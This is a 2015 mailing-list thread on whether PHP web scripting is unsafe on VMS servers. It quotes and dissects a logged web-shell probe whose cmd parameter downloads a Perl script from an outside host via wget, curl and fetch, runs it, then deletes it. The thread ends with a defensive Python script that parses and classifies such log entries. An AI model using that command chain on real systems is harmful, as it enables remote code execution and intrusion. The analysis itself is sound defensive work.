[Info-vax] Using VMS for a web server

Dirk Munk munk at home.nl
Wed Jun 10 01:58:05 EDT 2015


Jan-Erik Soderholm wrote:
> Bill Gunshannon skrev den 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and its "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprise me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanitized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET
>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immediately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using three
>> common ways of doing it (I don't know if any of these are available on VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in either
>> PHP or Perl.  This allows outsiders who do not have an account on a system
>> to get in for a look around.  Good way to look for security shortcomings.
>>
>> bill
>>
>
> OK. That needs a script called wawalo.php already being on the server
> in a directory where the server can execute it. The exploit is really
> to be able to upload the wawalo.php file in the first place.
>
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that from the same
> directory, you have a severe problem.
>
> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?
>
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.
>
> Can this be done on a WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory.

Is that true? After all, a script file is not an executable. It is 
'just' a file to be read by the PHP runtime executable, and then PHP is 
doing the actual processing.

So the question is if script languages in a way undermine the VMS 
security setup.

> You can also set it up so that PHP
> script can only be executed from a safe "script" directory
> with no external write access.
>
> But again, is it really a "hole in PHP" ?? I'm not sure...
>
>
> Jan-Erik.
>
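The breakdown Bill does by hand above, done as a script. This is an added example for this thread, not code from the original posts nor from any VMS/WASD or PHP component: it parses an Apache combined-format log line, percent-decodes the query string, splits the injected `cmd` value on shell separators and classifies each stage (download, execute, cleanup), then gives a verdict that takes the HTTP status into account, since the 404 in the quoted entry means the probe missed (no wawalo.php on that host) while a 2xx would mean the script was actually there to answer. The parameter names, the tool lists and the status rule are assumptions; the log line is the one quoted in the thread, reassembled as a single string.

```python
"""Triage a suspicious access-log entry: parse it, decode the query string,
reconstruct the injected shell command chain and classify each stage.
Added example for this thread, not code from the original post."""
import re
import shlex
from urllib.parse import unquote_plus, urlsplit

# The entry quoted in the thread, reassembled as one string (constructed sample).
LOG_LINE = (
    '103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET '
    '/wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php'
    '?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;'
    'curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;'
    'fetch%20http://identerprise.co.kr/css/b.txt;'
    'perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"'
)

# Apache/NCSA combined log format.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumptions: parameter names web shells commonly use, and the tool names the
# quoted probe relies on. Extend both from your own logs.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
FETCHERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "php", "python", "sh", "bash"}
# Separators a shell treats as command boundaries.
CHAIN_SEP = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")


def split_query(query):
    """Split on '&' only and percent-decode. ';' must survive: it is the
    attacker's command separator (parse_qs handles it inconsistently across
    Python versions, so it is not used here)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_log_line(line):
    """Return the log fields plus decoded 'path' and 'query', or None."""
    m = CLF.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    target = urlsplit(entry["target"])
    entry["path"] = target.path
    entry["query"] = split_query(target.query)
    return entry


def split_command_chain(command):
    """'wget ...;curl ...;perl x' -> ['wget ...', 'curl ...', 'perl x']."""
    return [stage for stage in CHAIN_SEP.split(command) if stage]


def classify_stage(stage):
    """Label one command as download / execute / cleanup / other."""
    try:
        argv = shlex.split(stage)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = stage.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in FETCHERS:
        urls = [a for a in argv[1:] if a.startswith(("http://", "https://", "ftp://"))]
        return ("download", prog, urls)
    if prog in INTERPRETERS:
        return ("execute", prog, argv[1:])
    if prog == "rm":
        return ("cleanup", prog, argv[1:])
    return ("other", prog, argv[1:])


def analyze(entry):
    """Findings for every shell-style parameter in the decoded query."""
    findings = []
    for name, values in entry["query"].items():
        if name.lower() not in SHELL_PARAMS:
            continue
        for value in values:
            for stage in split_command_chain(value):
                finding = classify_stage(stage)
                if finding:
                    findings.append(finding)
    return findings


def triage(line):
    entry = parse_log_line(line)
    if entry is None:
        return {"verdict": "unparsed"}
    findings = analyze(entry)
    if not findings:
        verdict = "clean"
    elif entry["status"].startswith("2"):
        verdict = "possible_compromise"  # the script answered, so it exists
    else:
        verdict = "probe_failed"  # 404 and friends: no such script on this host
    return {"ip": entry["ip"], "path": entry["path"], "status": entry["status"],
            "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(LOG_LINE).items():
        print(f"{key}: {value}")
```

Run it over a whole access log with `for line in open(path): triage(line)` and sort by verdict; the "possible_compromise" bucket is the one worth an incident ticket, the "probe_failed" bucket tells you which plugin paths are being scanned for.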
